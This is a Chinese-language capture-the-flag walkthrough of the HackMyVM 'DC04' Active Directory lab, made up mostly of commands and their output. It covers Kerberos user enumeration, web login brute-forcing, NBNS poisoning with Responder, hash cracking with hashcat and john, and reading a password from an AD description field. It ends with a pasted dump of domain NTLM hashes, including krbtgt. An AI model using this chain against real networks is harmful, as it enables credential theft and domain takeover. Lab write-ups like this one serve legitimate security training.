HMV-DC04

HMV-DC04

IP寻址

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
172.16.52.135 08:00:27:7a:98:40 (Unknown)

信息收集

nmap扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 172.16.52.135
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-09 07:46 EST
Nmap scan report for 172.16.52.135
Host is up (0.00032s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://soupedecode.local
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-10 04:47:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 15h59m58s
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:7a:98:40 (Oracle VirtualBox virtual NIC)
| smb2-time:
| date: 2025-12-10T04:47:22
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.29 seconds

SMB匿名连接

┌──(root㉿kali)-[/home/kali]
└─# smbclient -L 172.16.52.135 -N
session setup failed: NT_STATUS_ACCESS_DENIED

意料之中

kerbrute枚举用户

┌──(root㉿kali)-[/home/kali/Desktop/tools/kerbrute]
└─# ./kerbrute userenum --dc 172.16.52.135 -d SOUPEDECODE.LOCAL /home/kali/Desktop/wordlists/kali/rockyou.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 12/09/25 - Ronnie Flathers @ropnop
2025/12/09 07:57:43 > Using KDC(s):
2025/12/09 07:57:43 > 172.16.52.135:88
2025/12/09 07:57:44 > [+] VALID USERNAME: administrator@SOUPEDECODE.LOCAL
2025/12/09 07:59:06 > [+] VALID USERNAME: Administrator@SOUPEDECODE.LOCAL
2025/12/09 07:59:33 > [+] VALID USERNAME: otara1@SOUPEDECODE.LOCAL
2025/12/09 07:59:42 > [+] VALID USERNAME: mailserver@SOUPEDECODE.LOCAL
2025/12/09 08:00:29 > [+] VALID USERNAME: ADMINISTRATOR@SOUPEDECODE.LOCAL
2025/12/09 08:01:16 > [+] VALID USERNAME: webserver@SOUPEDECODE.LOCAL
2025/12/09 08:08:35 > [+] VALID USERNAME: fileserver@SOUPEDECODE.LOCAL

添加hosts

172.16.52.135 SOUPEDECODE.LOCAL

密码喷洒

┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# crackmapexec smb 172.16.52.135 -u ./user1.txt -p ./user1.txt --continue-on-success --no-bruteforce
SMB 172.16.52.135 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.52.135 445 DC01 [-] SOUPEDECODE.LOCAL\administrator:administrator STATUS_LOGON_FAILURE
SMB 172.16.52.135 445 DC01 [-] SOUPEDECODE.LOCAL\Administrator:Administrator STATUS_LOGON_FAILURE
SMB 172.16.52.135 445 DC01 [-] SOUPEDECODE.LOCAL\otara1:otara1 STATUS_LOGON_FAILURE
SMB 172.16.52.135 445 DC01 [-] SOUPEDECODE.LOCAL\mailserver:mailserver STATUS_LOGON_FAILURE
SMB 172.16.52.135 445 DC01 [-] SOUPEDECODE.LOCAL\ADMINISTRATOR:ADMINISTRATOR STATUS_LOGON_FAILURE
SMB 172.16.52.135 445 DC01 [-] SOUPEDECODE.LOCAL\webserver:webserver STATUS_LOGON_FAILURE
SMB 172.16.52.135 445 DC01 [-] SOUPEDECODE.LOCAL\fileserver:fileserver STATUS_LOGON_FAILURE

wireshark抓包

没发现什么

lookupsid匿名列举

┌──(root㉿kali)-[/home/kali/Desktop/tools/kerbrute]
└─# impacket-lookupsid SOUPEDECODE.LOCAL/anonymous@172.16.52.135
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at 172.16.52.135
[*] StringBinding ncacn_np:172.16.52.135[\pipe\lsarpc]
[-] SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.

80端口

操了,打几套靶场打习惯了,根本没注意到80端口开放

目录扫描

┌──(root㉿kali)-[/home/kali/Desktop/tools/kerbrute]
└─# dirsearch -u http://soupedecode.local/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/Desktop/tools/kerbrute/reports/http_soupedecode.local/__25-12-09_08-34-07.txt
Target: http://soupedecode.local/
[08:34:07] Starting:
[08:34:29] 200 - 9KB - /server-status/
[08:34:29] 200 - 9KB - /server-status
[08:34:29] 200 - 100KB - /server-info

添加hosts

172.16.52.135 heartbeat.soupedecode.local

8080端口

访问heartbeat.soupedecode.local

给了一个登录框

那还说啥了爆破得了

密码爆破

apt install seclists

用户名为admin,加载的字典为/usr/share/seclists/Passwords/Default-Credentials/default-passwords.txt

用kali爆破慢是因为burpsuite为免费版本

得到一个凭证admin:nimda

抓包看看

Network Share Heartbeat

那么我把ip地址改为kali的ip

然后利用靶机发送ip连接

再用kali进行wireshark抓包试试呢

看了,搞不懂它在连接个啥

不过可以看见它在发NBNS协议

那么就可以用responder工具进行欺骗

┌──(root㉿kali)-[/home/kali]
└─# responder -I eth0 -wd
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
[SMB] NTLMv2-SSP Client : 172.16.52.135
[SMB] NTLMv2-SSP Username : soupedecode\websvc
[SMB] NTLMv2-SSP Hash : websvc::soupedecode:98344977c341f6b5:D2DB8A611635B2B088A7952E706AE62F:0101000000000000003F7F44ED68DC015CAD161DD4A4823000000000020008004F0034003700470001001E00570049004E002D0032004E0059004E003500480047005A0056004400440004003400570049004E002D0032004E0059004E003500480047005A005600440044002E004F003400370047002E004C004F00430041004C00030014004F003400370047002E004C004F00430041004C00050014004F003400370047002E004C004F00430041004C0007000800003F7F44ED68DC010600040002000000080030003000000000000000000000000040000031B5F8225B6CAA1956F50D2A7584BE833CD24EB1D426306C5C4B8DCB48C0272A0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00350035002E003200310030000000000000000000

成功得到一份账户hash

Hashcat爆破

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

成功得到密码jordan23

二次信息收集

smb连接

┌──(root㉿kali)-[/home/kali]
└─# smbclient -L 172.16.52.135 -U SOUPEDECODE.LOCAL/websvc%jordan23
session setup failed: NT_STATUS_PASSWORD_EXPIRED

✔ 你这个域账户 SOUPEDECODE.LOCAL\websvc 的密码已经过期
✔ Windows 要求用户在首次登录或达到过期策略后 必须更改密码
✔ smbclient 不能自动处理这种情况,所以认证失败

自行改密

┌──(root㉿kali)-[/home/kali]
└─# smbpasswd -r 172.16.52.135 -U SOUPEDECODE.LOCAL/websvc
Old SMB password:
New SMB password:
Retype new SMB password:
machine 172.16.52.135 rejected the session setup. Error was : NT_STATUS_ACCESS_DENIED

权限不够

enum4linux

enum4linux -u 'websvc' -p 'jordan23' -a 172.16.52.135

不允许访问

查看SMB共享目录

Terminal window
┌──(root㉿kali)-[/home/kali]
└─# netexec smb 172.16.52.135 -u websvc -p jordan23 --shares
SMB 172.16.52.135 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.52.135 445 DC01 [-] SOUPEDECODE.LOCAL\websvc:jordan23 STATUS_PASSWORD_EXPIRED

还是凭据过期

看解析说这是一个bug

修改密码

  • 右键ctrl+delete解锁
  • esc切换至选用户界面 ×4
  • Other users
  • Local or domain account password(卡住就按下上下键)
  • 密码登录界面
  • 显示密码过期需要修改
  • 修改密码
  • enter即可

密码修改为heathcliff

SMB连接

Terminal window
┌──(root㉿kali)-[/home/kali]
└─# smbclient -L 172.16.52.135 -U SOUPEDECODE.LOCAL/websvc%heathcliff
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 172.16.52.135 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Terminal window
┌──(root㉿kali)-[/home/kali]
└─# smbclient //172.16.52.135/C -U SOUPEDECODE.LOCAL/websvc%heathcliff
Try "help" to get a list of possible commands.
smb: \Users\> cd websvc\Desktop\
smb: \Users\websvc\Desktop\> get user.txt
getting file \Users\websvc\Desktop\user.txt of size 32 as user.txt (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)
smb: \Users\websvc\Desktop\>
smb: \Users\> ls
. DR 0 Wed Nov 6 20:55:53 2024
.. DHS 0 Tue Nov 5 18:30:29 2024
Administrator D 0 Sat Jun 15 15:56:40 2024
All Users DHSrn 0 Sat May 8 04:26:16 2021
Default DHR 0 Sat Jun 15 22:51:08 2024
Default User DHSrn 0 Sat May 8 04:26:16 2021
desktop.ini AHS 174 Sat May 8 04:14:03 2021
fjudy998 D 0 Wed Nov 6 20:55:33 2024
ojake987 D 0 Wed Nov 6 20:55:16 2024
Public DR 0 Sat Jun 15 13:54:32 2024
rtina979 D 0 Wed Nov 6 20:54:39 2024
websvc D 0 Wed Nov 6 20:44:11 2024
xursula991 D 0 Wed Nov 6 20:55:28 2024
12942591 blocks of size 4096. 11009079 blocks available
smb: \Users\> cd rtina979\
smb: \Users\rtina979\> ls
NT_STATUS_ACCESS_DENIED listing \Users\rtina979\*
smb: \Users\rtina979\>

可以发现rtina979禁止访问,需要重点关注

user.txt

Terminal window
┌──(root㉿kali)-[/home/kali]
└─# cat user.txt
709e449a996a85aa7deaf18c79515d6a

enum4linux

Terminal window
enum4linux -u 'websvc' -p 'heathcliff' -a 172.16.52.135

提取用户

Terminal window
┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# enum4linux -u 'websvc' -p 'heathcliff' -a 172.16.52.135 > enum
┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# grep -Po 'user:\[\K[^\]]+' enum > user2.txt

用户爆破

--rid-bruteImpacket 的 secretsdump.py / samrdump 等工具提供的一个 RID (Relative ID)暴力枚举功能。

不需要管理员权限
只要能登录 SMB

Terminal window
netexec smb $IP -u websvc -p 'heathcliff' --rid-brute | grep SidTypeUser |cut -d: -f2 |cut -d \\ -f2 |cut -d ' ' -f1 > names.txt

rpcclient

RID-brute

Terminal window
┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# rpcclient -U "websvc%heathcliff" 172.16.52.135 -c "querydispinfo" | grep rtina
index: 0x131f RID: 0x7fd acb: 0x00020010 Account: rtina979 Name: Reed Tina Desc: Default Password Z~l3JhcV#7Q-1#M

得到rtina979的密码为Z~l3JhcV#7Q-1#M

虽然 websvc 是个普通域账户,但它拥有 最基础的认证权限,即:

只要账号能成功进行 NTLM/Kerberos 认证
就能访问 Windows 的 SAMR(Security Account Manager Remote)接口

SAMR 的默认权限 = 允许任何经过身份验证的域用户枚举域用户信息

包括:

  • querydispinfo
  • enumdomusers
  • enumdomgroups
  • lookupnames
  • RID loop 枚举

这是微软默认行为,并不是漏洞。

📌 换句话说:只要你有一个域账号,不管权限多低,你都能列出整个域的用户列表。

Desc” 是什么意思?

在 rpcclient 中,你看到:

UserName : xxxx
FullName : xxxx
Desc : something here

**这里的 **Desc = Description 字段

它对应 AD 用户对象的属性:

description

这一字段通常由管理员填写,用来表示:

  • 此账户负责什么业务
  • 由谁创建
  • 密码要求
  • 功能描述

🔥** BUT!!靶机中这个字段非常常被用来隐藏密码。**

rtina979

密码过期,直接进主机进行修改

SMB连接

Terminal window
┌──(root㉿kali)-[/home/kali]
└─# smbmap -H 172.16.52.181 -d SOUPEDECODE.LOCAL -u rtina979 -p heathcliff
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] You pressed Ctrl+C!..
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 172.16.52.181:445 Name: 172.16.52.181 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C READ ONLY
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Terminal window
┌──(root㉿kali)-[/home/kali]
└─# smbclient //172.16.52.181/C -U SOUPEDECODE.LOCAL/rtina979%heathcliff
Try "help" to get a list of possible commands.
smb: \Users\rtina979\Documents\> ls
. DR 0 Thu Nov 7 17:35:52 2024
.. D 0 Wed Nov 6 20:54:39 2024
My Music DHSrn 0 Wed Nov 6 20:54:39 2024
My Pictures DHSrn 0 Wed Nov 6 20:54:39 2024
My Videos DHSrn 0 Wed Nov 6 20:54:39 2024
Report.rar A 712046 Thu Nov 7 08:35:49 2024
12942591 blocks of size 4096. 11006845 blocks available
smb: \Users\rtina979\Documents\> get Report.rar
getting file \Users\rtina979\Documents\Report.rar of size 712046 as Report.rar (36597.6 KiloBytes/sec) (average 36597.8 KiloBytes/sec)

压缩包爆破

Terminal window
┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# unrar e Report.rar
UNRAR 7.10 beta 1 freeware Copyright (c) 1993-2024 Alexander Roshal
Enter password (will not be echoed) for Report.rar:
Program aborted

需要密码所以要爆破

Terminal window
┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# rar2john Report.rar > hash1
┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# cat hash1
┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# john -w=/usr/share/wordlists/rockyou.txt hash1
Using default input encoding: UTF-8
Loaded 1 password hash (RAR5 [PBKDF2-SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
PASSWORD123 (Report.rar)
1g 0:00:00:54 DONE (2025-12-09 23:14) 0.01850g/s 952.3p/s 952.3c/s 952.3C/s ang123..2pac4ever
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Report.rar:$rar5$16$7b74f4c32feb807c16edc906c283e524$15$872f8d1a914bd1503dac110c7bbb938a$8$3e15430028d503b5
Terminal window
┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# unrar e Report.rar
UNRAR 7.10 beta 1 freeware Copyright (c) 1993-2024 Alexander Roshal
Enter password (will not be echoed) for Report.rar:
The specified password is incorrect.
Enter password (will not be echoed) for Report.rar:
Extracting from Report.rar
Extracting Pentest Report.htm OK
Extracting m2-unbound-source-serif-pro.css OK
Extracting main-branding-base.W9J-2zkF03j8TkriAGn1Tg.12.css OK
Extracting dart.min.js OK
Extracting google-analytics_analytics.js OK
Extracting highlight.min.js OK
Extracting main-base.bundle.IcW7tD43-xaHoBj2_P6wLQ.12.js OK
Extracting main-common-async.bundle.SkTeOM8g4JVEInYAgrgW9Q.12.js OK
Extracting main-notes.bundle.qVLVB-ghGjYQMo6npDHNjw.12.js OK
Extracting main-posters.bundle.JMIo8YhZ0NhbVObiML4nWQ.12.js OK

可以发现解压出一个网页

Terminal window
file_svc:$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$soupedecode.local/file_svc*$afade2a48795f1f
SMB 192.168.56.121 445 DC01 [*] Windows 6.1 Build 7600 x64 (name:DC01) (domain:soupedecode.local) (signing:True) (SMBv1:False)
SMB 192.168.56.121 445 DC01 [+] soupedecode.local\FileServer$:9e564...SNIP...500 (Pwn3d!)
SMB 192.168.56.126 445 DC01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0f55cdc40bd8f5814587f7e6b2f85e6f:::
SMB 192.168.56.126 445 DC01 soupedecode.local\bmark0:1103:aad3b435b51404eeaad3b435b51404ee:d72c66e955a6dc0fe5e76d205a630b15:::
SMB 192.168.56.126 445 DC01 soupedecode.local\otara1:1104:aad3b435b51404eeaad3b435b51404ee:ee98f16e3d56881411fbd2a67a5494c6:::
SMB 192.168.56.126 445 DC01 soupedecode.local\kleo2:1105:aad3b435b51404eeaad3b435b51404ee:bda63615bc51724865a0cd0b4fd9ec14:::
SMB 192.168.56.126 445 DC01 soupedecode.local\eyara3:1106:aad3b435b51404eeaad3b435b51404ee:68e34c259878fd6a31c85cbea32ac671:::
SMB 192.168.56.126 445 DC01 soupedecode.local\pquinn4:1107:aad3b435b51404eeaad3b435b51404ee:92cdedd79a2fe7cbc8c55826b0ff2d54:::
SMB 192.168.56.126 445 DC01 soupedecode.local\jharper5:1108:aad3b435b51404eeaad3b435b51404ee:800f9c9d3e4654d9bd590fc4296adf01:::
SMB 192.168.56.126 445 DC01 soupedecode.local\bxenia6:1109:aad3b435b51404eeaad3b435b51404ee:d997d3309bc876f12cbbe932d82b18a3:::
SMB 192.168.56.126 445 DC01 soupedecode.local\gmona7:1110:aad3b435b51404eeaad3b435b51404ee:c2506dfa7572da51f9f25b603da874d4:::
SMB 192.168.56.126 445 DC01 soupedecode.local\oaaron8:1111:aad3b435b51404eeaad3b435b51404ee:869e9033466cb9f7f8d0ce5a5c3305c6:::
SMB 192.168.56.126 445 DC01 soupedecode.local\pleo9:1112:aad3b435b51404eeaad3b435b51404ee:54a3a0c87893e1051e6f7b629ca144ef:::
SMB 192.168.56.126 445 DC01 soupedecode.local\evictor10:1113:aad3b435b51404eeaad3b435b51404ee:c918a6413865d3701a40071365fa1c3e:::
SMB 192.168.56.126 445 DC01 soupedecode.local\wreed11:1114:aad3b435b51404eeaad3b435b51404ee:a581adbf0e50ba5e4b4c4d95ca190471:::
SMB 192.168.56.126 445 DC01 soupedecode.local\bgavin12:1115:aad3b435b51404eeaad3b435b51404ee:ba78418ef53add0841b76f103e487bf5:::
SMB 192.168.56.126 445 DC01 soupedecode.local\ndelia13:1116:aad3b435b51404eeaad3b435b51404ee:341b52ef9e84306e4efbbf275428640e:::
SMB 192.168.56.126 445 DC01 soupedecode.local\akevin14:1117:aad3b435b51404eeaad3b435b51404ee:cf31e20946a86113fef93a640d8dc64e:::
SMB 192.168.56.126 445 DC01 soupedecode.local\kxenia15:1118:aad3b435b51404eeaad3b435b51404ee:a34ebec647265a56cfd0b45b45b60922:::
SMB 192.168.56.126 445 DC01 soupedecode.local\ycody16:1119:aad3b435b51404eeaad3b435b51404ee:e50f0a735af2069ed26c13b1ad7df962:::
SMB 192.168.56.126 445 DC01 soupedecode.local\qnora17:1120:aad3b435b51404eeaad3b435b51404ee:89237fedf5fb31cdd847a88e33b4d09b:::
SMB 192.168.56.126 445 DC01 soupedecode.local\dyvonne18:1121:aad3b435b51404eeaad3b435b51404ee:9f72bb25fa1d246fa8cfbd243bdd51fb:::
SMB 192.168.56.126 445 DC01 soupedecode.local\qxenia19:1122:aad3b435b51404eeaad3b435b51404ee:a1535954f1808f130fee8b2c8f02a692:::
SMB 192.168.56.126 445 DC01 soupedecode.local\rreed20:1123:aad3b435b51404eeaad3b435b51404ee:aac6265594fead59fa15d377bbbb2dcb:::
SMB 192.168.56.126 445 DC01 soupedecode.local\icody21:1124:aad3b435b51404eeaad3b435b51404ee:b19f543d19fa53cc96c319c68e7c25a5:::
SMB 192.168.56.126 445 DC01 soupedecode.local\ftom22:1125:aad3b435b51404eeaad3b435b51404ee:f10af34344849008dfdca5481c699073:::
SMB 192.168.56.126 445 DC01 soupedecode.local\ijake23:1126:aad3b435b51404eeaad3b435b51404ee:801f7dab7e0d2381e2579a0d38ba7b66:::
SMB 192.168.56.126 445 DC01 soupedecode.local\rpenny24:1127:aad3b435b51404eeaad3b435b51404ee:5fab1372261215c4b044a87783431864:::
SMB 192.168.56.126 445 DC01 soupedecode.local\jiris25:1128:aad3b435b51404eeaad3b435b51404ee:aa6012bfc74a0369d29156021f3257bc:::
SMB 192.168.56.126 445 DC01 soupedecode.local\colivia26:1129:aad3b435b51404eeaad3b435b51404ee:8f5f5bb40aff00e15459b391f7921b75:::
SMB 192.168.56.126 445 DC01 soupedecode.local\pyvonne27:1130:aad3b435b51404eeaad3b435b51404ee:b6fd3ed6bb8d9e663ea1c94d7b389742:::
SMB 192.168.56.126 445 DC01 soupedecode.local\zfrank28:1131:aad3b435b51404eeaad3b435b51404ee:047bd6340fd9ba02f528fdd53f3ef75d:::
SMB 192.168.56.126 445 DC01 soupedecode.local\ybob317:1132:aad3b435b51404eeaad3b435b51404ee:6c1bb84837a6e5f236a14e7ee738bcb2:::
SMB 192.168.56.126 445 DC01 soupedecode.local\file_svc:1133:aad3b435b51404eeaad3b435b51404ee:2806705edcad95cdbcae8c0b579e77bd:::
SMB 192.168.56.126 445 DC01 soupedecode.local\qethan32:1135:aad3b435b51404eeaad3b435b51404ee:88a4ff75882e901d5297177e77b283ef:::
SMB 192.168.56.126 445 DC01 soupedecode.local\khenry33:1136:aad3b435b51404eeaad3b435b51404ee:5b54e2ed8cb45535eeed141497b4c4ad:::
SMB 192.168.56.126 445 DC01 soupedecode.local\sjudy34:1137:aad3b435b51404eeaad3b435b51404ee:9c31a3819c17a301ee81fe6153736fe3:::
SMB 192.168.56.126 445 DC01 soupedecode.local\rrachel35:1138:aad3b435b51404eeaad3b435b51404ee:2cdca6302c467b2e6e20ed6569b4ec05:::
SMB 192.168.56.126 445 DC01 soupedecode.local\caiden36:1139:aad3b435b51404eeaad3b435b51404ee:fdd90e58478ff95f06e0ec63d843966c:::
SMB 192.168.56.126 445 DC01 soupedecode.local\xbella37:1140:aad3b435b51404eeaad3b435b51404ee:cf73af1266f43400736bb947a39d5c2d:::
SMB 192.168.56.126 445 DC01 soupedecode.local\smark38:1141:aad3b435b51404eeaad3b435b51404ee:c259b454d173d109570f548bc4c80586:::
SMB 192.168.56.126 445 DC01 soupedecode.local\zximena448:1142:aad3b435b51404eeaad3b435b51404ee:09f26c79361eb03865275f61f0d60336:::
SMB 192.168.56.126 445 DC01 soupedecode.local\fmike40:1143:aad3b435b51404eeaad3b435b51404ee:48e0d7983f09b77aebd1ad4bbd5854b5:::
SMB 192.168.56.126 445 DC01 soupedecode.local\yeli41:1144:aad3b435b51404eeaad3b435b51404ee:47396dcddefeeb7941f2da82c80b08fc:::
SMB 192.168.56.126 445 DC01 soupedecode.local\knina42:1145:aad3b435b51404eeaad3b435b51404ee:a3fd7598c3b7d31392c9dab7974b17bf:::
SMB 192.168.56.126 445 DC01 soupedecode.local\vhelen43:1146:aad3b435b51404eeaad3b435b51404ee:0bb00e50f5b5543c96fc44de85574dc9:::
SMB 192.168.56.126 445 DC01 soupedecode.local\xoliver44:1147:aad3b435b51404eeaad3b435b51404ee:8040440a5a5cc24d8396ddfaeca5449b:::
SMB 192.168.56.126 445 DC01 soupedecode.local\jxander45:1148:aad3b435b51404eeaad3b435b51404ee:5b0891170d505561fc1d5e15324eebe3:::
SMB 192.168.56.126 445 DC01 soupedecode.local\czane46:1149:aad3b435b51404eeaad3b435b51404ee:c359110d940bafdabb4fbaafd939c04f:::
SMB 192.168.56.126 445 DC01 soupedecode.local\rwendy47:1150:aad3b435b51404eeaad3b435b51404ee:aa5997bbd9979fa1bfe36a0b71a60492:::
SMB 192.168.56.126 445 DC01 soupedecode.local\usean48:1151:aad3b435b51404eeaad3b435b51404ee:bf62b617cecc972f9dd14658ad39ff11:::
SMB 192.168.56.126 445 DC01 soupedecode.local\fhenry49:1152:aad3b435b51404eeaad3b435b51404ee:3ad857fdec198942ffc7515dcc832a9c:::
SMB 192.168.56.126 445 DC01 soupedecode.local\xkaren50:1153:aad3b435b51404eeaad3b435b51404ee:985711636a0b82d29fc11128d73d0cae:::
SMB 192.168.56.126 445 DC01 soupedecode.local\rbianca51:1154:aad3b435b51404eeaad3b435b51404ee:8ba444ab206cecbab4ed60b67c97efaa:::
SMB 192.168.56.126 445 DC01 soupedecode.local\mmona52:1155:aad3b435b51404eeaad3b435b51404ee:7cbb29015e4b6b0dbc3c03306a34951a:::
SMB 192.168.56.126 445 DC01 soupedecode.local\znora53:1156:aad3b435b51404eeaad3b435b51404ee:b5155ab1d24cfa4933c163fd847c2f04:::
SMB 192.168.56.126 445 DC01 soupedecode.local\zlila54:1157:aad3b435b51404eeaad3b435b51404ee:963305aaddd33d7f5794673a6abef94f:::
SMB 192.168.56.126 445 DC01 soupedecode.local\lliam55:1158:aad3b435b51404eeaad3b435b51404ee:6161f5e4e1eeabf6495fa94b20452ea8:::
SMB 192.168.56.126 445 DC01 soupedecode.local\znathan56:1159:aad3b435b51404eeaad3b435b51404ee:1a283daf0aae0b222dd99424583fd95e:::
SMB 192.168.56.126 445 DC01 soupedecode.local\kbella57:1160:aad3b435b51404eeaad3b435b51404ee:2fe66343f4b6e3a44dfc3fa970555a32:::
SMB 192.168.56.126 445 DC01 soupedecode.local\malice58:1161:aad3b435b51404eeaad3b435b51404ee:eeae0838405421f1e5387735e417f238:::
SMB 192.168.56.126 445 DC01 soupedecode.local\gadam59:1162:aad3b435b51404eeaad3b435b51404ee:be04e40e37d84cb655d39d944edff55d:::
SMB 192.168.56.126 445 DC01 soupedecode.local\byara60:1163:aad3b435b51404eeaad3b435b51404ee:3144195749475777ac877bf26160a1f2:::
SMB 192.168.56.126 445 DC01 soupedecode.local\fpenny61:1164:aad3b435b51404eeaad3b435b51404ee:2e936cf39faac7bd327d1fc4a923991b:::
SMB 192.168.56.126 445 DC01 soupedecode.local\tmona62:1165:aad3b435b51404eeaad3b435b51404ee:3d598e1b62ee28c4716d732c5a18a491:::
SMB 192.168.56.126 445 DC01 soupedecode.local\iuma63:1166:aad3b435b51404eeaad3b435b51404ee:c072a0fbdf9c330cb0362af964c5dea5:::
SMB 192.168.56.126 445 DC01 soupedecode.local\voscar64:1167:aad3b435b51404eeaad3b435b51404ee:7e599f533c36f5296aa6f714f89049b6:::
SMB 192.168.56.126 445 DC01 soupedecode.local\mpeter65:1168:aad3b435b51404eeaad3b435b51404ee:e7f4f860fd1ff873e2aed8ad0bce8d43:::
SMB 192.168.56.126 445 DC01 soupedecode.local\suna66:1169:aad3b435b51404eeaad3b435b51404ee:12a993f319ed123858bf78eb0e6dad87:::
SMB 192.168.56.126 445 DC01 soupedecode.local\bmegan67:1170:aad3b435b51404eeaad3b435b51404ee:7c697424104788b1ee289137f3432dd8:::
SMB 192.168.56.126 445 DC01 soupedecode.local\vsteve68:1171:aad3b435b51404eeaad3b435b51404ee:3280107c4a792f6adcb97876a3cb5f91:::
SMB 192.168.56.126 445 DC01 soupedecode.local\zcolin69:1172:aad3b435b51404eeaad3b435b51404ee:51c1adf50b3dd20dfed667e966af5091:::
SMB 192.168.56.126 445 DC01 soupedecode.local\wzane70:1173:aad3b435b51404eeaad3b435b51404ee:e278b99f3b9defc89092d86930cb7ad4:::
SMB 192.168.56.126 445 DC01 soupedecode.local\poscar71:1174:aad3b435b51404eeaad3b435b51404ee:489e964541ee04127e53dbea4a1807cd:::
SMB 192.168.56.126 445 DC01 soupedecode.local\walice72:1175:aad3b435b51404eeaad3b435b51404ee:57e9d64fd4bc187a18b2c62e2c6b0121:::
SMB 192.168.56.126 445 DC01 soupedecode.local\gvera73:1176:aad3b435b51404eeaad3b435b51404ee:d88e17ab0f79fed61e29f601a5d5efa0:::
SMB 192.168.56.126 445 DC01 soupedecode.local\khenry74:1177:aad3b435b51404eeaad3b435b51404ee:ed3c1f1b21ecd8fc1b034ce9e58d553b:::
